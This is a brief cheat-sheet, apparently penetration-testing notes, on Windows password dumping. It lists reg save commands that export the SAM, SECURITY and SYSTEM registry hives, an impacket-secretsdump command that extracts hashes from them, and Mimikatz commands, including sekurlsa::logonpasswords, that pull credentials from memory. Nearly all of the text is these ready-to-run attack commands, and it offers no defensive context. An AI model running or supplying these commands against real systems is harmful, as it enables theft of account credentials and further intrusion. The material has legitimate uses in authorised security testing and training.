process of obtaining account login and password information, normally in the form of a hash or a clear text password.

Password Dumping

Manual

reg save hklm\\sam c:\\temp\\sam.save
reg save hklm\\security c:\\temp\\security.save
reg save hklm\\system c:\\temp\\system.save

on our own host:

impacket-secretsdump -sam sam.save -security security.save -system system.save LoOCAL

Mimikatz

Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets.

Link: https://github.com/gentilkiwi/mimikatz

Quick usage

Ask for debug privilege for mimikatz process. (have to be done first)

privilege::debug

Clear screen

Cls

Exit mimikatz

Exit

Examples

Dump credentials:

privilege::debug  
sekurlsa::logonpasswords